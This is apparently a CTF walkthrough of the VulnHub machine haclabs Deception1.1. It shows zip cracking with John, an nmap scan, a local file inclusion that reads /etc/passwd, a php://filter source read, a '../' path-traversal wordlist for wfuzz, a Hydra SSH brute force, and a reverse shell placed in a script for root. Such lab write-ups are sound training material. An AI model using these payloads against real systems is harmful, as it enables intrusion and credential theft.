(VulnHub) haclabs: deception1.1 WalkThrough — WriteUp

VulnHub Link: https://www.vulnhub.com/entry/haclabs-deception11,440/

Description:

This machine is the next part of Deception machine. This time try harder to get root!
To complete this challenge you need to find 3 flags.
flag 2 : Password to unzip the zip file.
flag 1 : Present in /home/yash/
flag 0 : Present in /root/
This is a beginner/intermediate level machine.
Technical Information :
    machine is based on Ubuntu 64bit
    Tested on virtualBox
    DHCP is enabled (set as bridged networking)
NOTE : you may face connection lost issue , no problem restart the virtual machine and everything will start to work again!
I found "646563657074696f6e312e31" this while creating the machine .
Contact
If you have solved this machine in an unintended way then please let us know, you may get a chance to publish your writeup on our website.
Works best in VirtualBox rather than VMware. Note: This is MEANT to be password protected

So as a first flag they ask from us to unzip the VMBox (ova file inside)

I could use zip2john to get the zip hash and try to crack it with a good wordlist

but I prefer to stay in the Box Description and exactly this line

I found "646563657074696f6e312e31" this while creating the machine .

You may think it hash but no this is a HEX Value and by Decrypting it:

deception1.1

before trying it let’s get the hash value using zip2john

> zip2john haclabs_deception1.1.zip > zip.hash
ver 2.0 efh 5455 efh 7875 haclabs_deception1.1.zip/Deception1.1.ova PKZIP Encr: 2b chk, TS_chk, cmplen=760997141, decmplen=776150016, crc=9E71CD97

and we have the hash in “zip.hash”

now we insert the password “deception1.1” in rockyou.txt and give johntheripper a run

C:\Users\ADMIN\Desktop
> johntheripper --wordlist=rockyou.txt zip.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
No password hashes left to crack (see FAQ)
C:\Users\ADMIN\Desktop
> johntheripper --show zip.hash
haclabs_deception1.1.zip/Deception1.1.ova:deception1.1:Deception1.1.ova:haclabs_deception1.1.zip::haclabs_deception1.1.zip
1 password hash cracked, 0 left

so the password is correct, let’s unzip the box and run it …

Nmap Scan:

> nmap -sC -sV 192.168.9.107
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-11 01:56 W. Central Africa Standard Time
Nmap scan report for 192.168.9.107
Host is up (0.000012s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 75:b3:93:d4:f1:02:30:bf:35:ea:12:4e:3b:e7:fa:4a (RSA)
|   256 f9:8c:43:5b:45:7d:fe:84:b1:f5:93:a3:68:bb:ce:84 (ECDSA)
|_  256 77:2a:33:3e:8f:2b:65:a5:f3:df:b5:bc:58:4a:f4:8e (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:4F:4F:EC (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.77 seconds

We have 2 opened ports

22 ==> SSH

80 ==> Apache HTTPD

Welcome to haclabs!
A dream does not become reality through magic; it takes sweat, determination, and hard work.
                                                          ~ Colin Powell, former U.S. Defense Secretary

HacLabs is a group of university students who are passionate about technology, writing and publishing articles 
to educate and enlighten those in need. We primarily focus on CTFs, Cloud, Data Structures and Algorithm and 
anything related to computer science.
Password strength checker designed by haclabs!

So they say this is a kind of password strength check let’s see what we got when we type admin:admin

The sent request from BurpSuite:

POST /users.php HTTP/1.1
Host: 192.168.9.107
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
Referer: http://192.168.9.107/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
username=admin&password=admin&login=Check

The Response:

HTTP/1.1 200 OK
Date: Sat, 11 Apr 2020 06:21:56 GMT
Server: Apache/2.4.38 (Debian)
Vary: Accept-Encoding
Content-Length: 357
Connection: close
Content-Type: text/html; charset=UTF-8
<html>
<body style="background-color:black">
<pre style="color:blue;font-size:40px;text-align:center">
Welcome User : admin
</pre>
<br>
<pre style="color:green;font-size:20px;text-align:left">
Password should be at least 8 characters in length and should include at least one upper case letter
one number, and one special character.</pre>
</body>
</html>

Let’s change our password to Admin1234!

The Response:

HTTP/1.1 200 OK
Date: Sat, 11 Apr 2020 06:23:21 GMT
Server: Apache/2.4.38 (Debian)
Vary: Accept-Encoding
Content-Length: 364
Connection: close
Content-Type: text/html; charset=UTF-8
<html>
<body style="background-color:black">
<pre style="color:blue;font-size:40px;text-align:center">
Welcome User : admin
</pre>
<br>
<pre style="color:green;font-size:20px;text-align:left">
<script>alert('0000flagflagflagflag.php')</script>Password is strong , contains all 4 things(uppercase,lowercase,number,specialchars) with flag=1 </pre>
</body>
</html>

in the browser something pop out

I checked if the file “0000flagflagflagflag.php” exists but nothing !

<script>alert('0000flagflagflagflag.php')</script>Password is strong , contains all 4 things(uppercase,lowercase,number,specialchars) with flag=1 </pre>

here it says flag=1 ,let’s change flag with one’s “00001111.php” …

We have something now :D !

The Source page:

<script>alert('find password.txt')</script>

<html>
<body>
<!-- use ?page= --!>
</body>
</html>

there is a comment says use “?page=”

I tried to read password.txt

http://192.168.9.107/00001111.php?page=password.txt

I got nothing and I changed it to /etc/passwd and we have the passwd file

root:x:0:0:root:/root:/bin/bash
haclabs:$6$E0Wz59PNTRyh.NJv$E4cKcQXD6lZEhmK4U.nbutUrw1pCQmqRppOThOp/AJorXoDsj2RGhWNiPl1GTwHiVvfExzYhS70QFNgnv.Z7/.:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
avahi:x:107:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:108:118::/var/lib/saned:/usr/sbin/nologin
colord:x:109:119:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:110:7:HPLIP system user,,,:/var/run/hplip:/bin/false
yash:x:1000:1000:yash,,,:/home/yash:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin

We have a kind of LFI here :D

http://192.168.9.107/00001111.php?page=php://filter/convert.base64-encode/resource=00001111.php

the PHP Wrapper works good and this is the 00001111.php file content after decoding the base64

<?php
echo "<script>alert('find password.txt')</script>";
$file = $_GET['page'];
$files = file_get_contents($file);
echo $files;
?>

So the file is using file_get_contents so even if we’ll find the access.log that doesn’t matter cause this will only show

the contents and not executing codes there …

let’s throw all the LFI things away

and go back to the challenge who’s asking from us to find password.txt so I have to run something with

wfuzz

C:\Users\ADMIN\Desktop
> wfuzz -c -u "http://192.168.9.107/00001111.php?page=FUZZ/password.txt" -w dot.txt --hw 10
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************
Target: http://192.168.9.107/00001111.php?page=FUZZ/password.txt
Total requests: 21
===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================
000000002:   200        61 L     32 W     263 Ch      "../../"
Total time: 0.023503
Processed Requests: 21
Filtered Requests: 20
Requests/sec.: 893.4914

the dot.txt is containing this :

../
../../
../../../
../../../../
../../../../../
../../../../../../
../../../../../../../
../../../../../../../../
../../../../../../../../../
../../../../../../../../../../
../../../../../../../../../../../
../../../../../../../../../../../../
../../../../../../../../../../../../../
../../../../../../../../../../../../../../
../../../../../../../../../../../../../../../
../../../../../../../../../../../../../../../../
../../../../../../../../../../../../../../../../../
../../../../../../../../../../../../../../../../../../
../../../../../../../../../../../../../../../../../../../
../../../../../../../../../../../../../../../../../../../../
../../../../../../../../../../../../../../../../../../../../../

I use it for path traversal ! …

so going back to wfuzz he found something at

000000002:   200        61 L     32 W     263 Ch      "../../"

so now by browsing http://192.168.9.107/00001111.php?page=../../password.txt

we got

I know the password for yash : ya5h**
but I forgot the last 2 words.
find them and use to connect to SSH

so it says that we have the yash password (with 2 forgotten words) he means this yash by the way …

yash:x:1000:1000:yash,,,:/home/yash:/bin/bash

So I had to create (code) something to complete the last 2 words and test the right one

I won’t use Capital letter cause it looks like Yash didn’t use ones …

I like using PHP in coding so I had to look in google for PHP wordlist generator and I got a good Class

https://github.com/gehaxelt/PHP-WordlistGenerator

I modified the example.php to this

<?php
include_once 'wordlistgenerator.class.php';
for ($i=2;$i<=2;$i++)
{
	$ws = new WordlistGenerator($i,'abcdefghijklmnopqrstuvwxyz');
	while($ws->isNext()) {
		echo "ya5h".$ws->getWord();
		file_put_contents("yash_wordlist.txt","ya5h".$ws->getWord()."\n",FILE_APPEND);
		$ws->nextWord();
		echo "\n";
	}
	unset($ws);
}
?>

that will save the generated words in a new text file “yash_wordlist.txt”

after generating the wordlist we take it to hydra and run a quick brute forcing on ssh

C:\Users\ADMIN\Desktop
> hydra -l yash -P yash_wordlist.txt ssh://192.168.9.107 -s 22 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-13 04:15:38
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 675 login tries (l:1/p:0), ~675 tries per task
[DATA] attacking ssh://192.168.9.107:22/
[22][ssh] host: 192.168.9.107   login: yash   password: ya5hay
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 5 final worker threads did not complete until end.
[ERROR] 5 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-04-13 04:15:43

and we got a valid login

[22][ssh] host: 192.168.9.107   login: yash   password: ya5hay

let’s login and do some enumeration …

as you see that was a quick enumeration :p we’ll get root in few seconds after I’ll login using SCP For windows

and modify the file perm.sh with a reverse shell

after saving it and start our listener on port 5656

let’s go back to our ssh and run the perm.sh file …

it says connection refused but by checking the listener we got something in return …

and that was all for this challenge from boot 2 root :D

Hope you enjoyed !

Follow me on Twitter : https://twitter.com/ab2pentest
If you liked my writeup and to support me for more :
https://www.buymeacoffee.com/ab2pentest
Other writeup’s and tool’s can be found here:
https://github.com/ab2pentest